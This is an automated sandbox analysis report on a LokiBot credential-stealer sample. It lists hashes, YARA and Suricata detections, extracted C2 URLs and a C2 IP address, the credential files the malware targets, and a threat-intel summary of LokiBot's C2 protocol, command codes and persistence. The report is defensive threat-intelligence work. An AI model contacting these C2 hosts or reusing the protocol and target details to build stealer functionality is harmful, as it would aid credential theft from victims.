Edit tour

Windows Analysis Report
EozUxz4ybi.exe

Overview

General Information

Sample name:	EozUxz4ybi.exe renamed because original name is a hash value
Original sample name:	e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f.exe
Analysis ID:	1588384
MD5:	e35101f489a8d1fd3b789335cbdde45d
SHA1:	011376368c334f83f335c486c322194e73bd6382
SHA256:	e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f
Tags:	exeuser-adrian__luca
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

EozUxz4ybi.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\EozUxz4ybi.exe" MD5: E35101F489A8D1FD3B789335CBDDE45D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
EozUxz4ybi.exe	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
EozUxz4ybi.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
EozUxz4ybi.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
EozUxz4ybi.exe	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
EozUxz4ybi.exe	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
EozUxz4ybi.exe	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
EozUxz4ybi.exe	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
EozUxz4ybi.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 3 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: EozUxz4ybi.exe PID: 2884	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: EozUxz4ybi.exe PID: 2884	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: EozUxz4ybi.exe PID: 2884	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: EozUxz4ybi.exe PID: 2884	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xabd5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xe4c5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.EozUxz4ybi.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.0.EozUxz4ybi.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.EozUxz4ybi.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.EozUxz4ybi.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.0.EozUxz4ybi.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.0.EozUxz4ybi.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.0.EozUxz4ybi.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.0.EozUxz4ybi.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.EozUxz4ybi.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.EozUxz4ybi.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.EozUxz4ybi.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EozUxz4ybi.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.EozUxz4ybi.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.EozUxz4ybi.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.EozUxz4ybi.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.EozUxz4ybi.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 11 entries

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:42:21.548499+0100	2024312	1	A Network Trojan was detected	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:22.950193+0100	2024312	1	A Network Trojan was detected	192.168.2.8	49705	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:42:20.817288+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:22.238848+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49705	94.156.177.41	80	TCP
2025-01-11T01:42:23.040247+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.920673+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:25.197136+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:26.102355+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.968789+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:28.135810+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:29.019551+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.891718+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:31.084444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.992422+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:32.889368+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:34.065163+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.969892+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:35.848202+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:36.756536+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:37.616845+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:38.534914+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:39.453290+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:40.352448+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.207139+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:42.069381+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.979513+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:44.030365+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.878656+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:45.910982+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:46.766963+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:47.676875+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:48.545843+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:49.438319+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:50.341121+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.209451+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:52.288988+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:53.175499+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.184422+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:55.035617+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.992626+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:56.917464+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:57.813692+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:58.986101+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:43:00.003340+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.875736+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:01.944954+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:02.826098+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:03.707674+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:04.854034+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:05.736299+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:06.614277+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:07.773450+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:08.660221+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:09.514398+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:10.707200+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:11.607612+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:12.528797+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:13.572275+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:14.611221+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:15.469661+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:16.338867+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:17.186517+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.171449+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:19.049624+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.935376+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:20.826439+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:21.716741+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:22.578331+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:23.456554+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:24.327063+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.184735+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:26.109254+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.979791+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:27.847811+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:28.764296+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:29.742691+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:30.877186+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:31.748335+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:32.607831+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:33.949545+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:34.814322+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:35.685742+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:36.565085+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:37.485335+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:38.387023+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.246713+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:40.188662+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:41.063388+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:42.036690+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.952923+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:43.902308+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:44.785246+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:45.736146+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:46.597242+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:47.457823+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:48.358447+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.238277+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:50.112871+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.991939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:51.872833+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:53.011219+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.904054+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:54.763804+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:55.926731+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:56.799040+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:57.706794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:58.606872+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:59.461313+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:00.327731+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.206037+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:02.066708+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:03.052322+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.938794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:04.874883+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:05.900134+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51480	94.156.177.41	80	TCP
